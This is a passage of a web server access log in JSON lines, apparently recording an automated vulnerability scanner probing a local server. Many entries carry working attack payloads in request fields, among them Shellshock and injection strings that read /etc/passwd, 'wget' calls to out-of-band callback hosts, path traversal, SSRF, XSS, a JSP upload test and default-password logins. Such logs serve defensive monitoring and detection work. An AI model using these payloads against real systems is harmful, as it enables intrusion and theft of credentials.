HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"userName=admin&password=123456","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xxl-job-admin/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/jarrewrite.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"\x22() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'\x22", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/deploy.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/elementor/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5Ctexample.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin@local.host\x22,\x22password\x22:\x225iveL!fe\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/68 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wpmudev-updates/keys/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dev/tests/functional/etc/config.xml.dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CMSPages/logon.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ccm/system/panels/page/preview_as_user/preview?cID=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/elFinder/elfinder.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger/ui/index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://ca2tuc8smpv1g2s80ca0tkf5t651swdnk.oast.pro%27);// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/loggers HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/push.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/jh-404-logger/readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com/%2F.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22root\x22,\x22password\x22:\x22123456789\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"j_username=weblogic&j_password=weblogic&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/69 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/pma/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /i.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"echo\x0D\x0Aecho\x0D\x0Acat /etc/passwd 2>&1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /clientaccesspolicy.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__swagger__/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/pluginscript/..;/..;/..;/getFavicon?host=ca2tuc8smpv1g2s80ca0tkpx8inm8a1iw.oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /wlmeng/../../../../../../../../../../../etc/passwd%00index.htm HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/lint.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /password.jsn HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://ca2tuc8smpv1g2s80ca0ptuptx88tj1ig.oast.pro; HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.135","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"j_username=weblogic&j_password=weblogic1&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"username=showdoc&password=123456&v_code=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /server/index.php?s=/api/user/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/70 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin\x22,\x22password\x22:\x22123456789\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /asdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"------WebKitFormBoundaryFy3iNVBftjP6IOwo\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22poc.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<%out.print(2be8e556fee1a876f10fa086979b8c7c);%>\x0D\x0A------WebKitFormBoundaryFy3iNVBftjP6IOwo--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /page/exportImport/uploadOperation.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_swagger_/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) 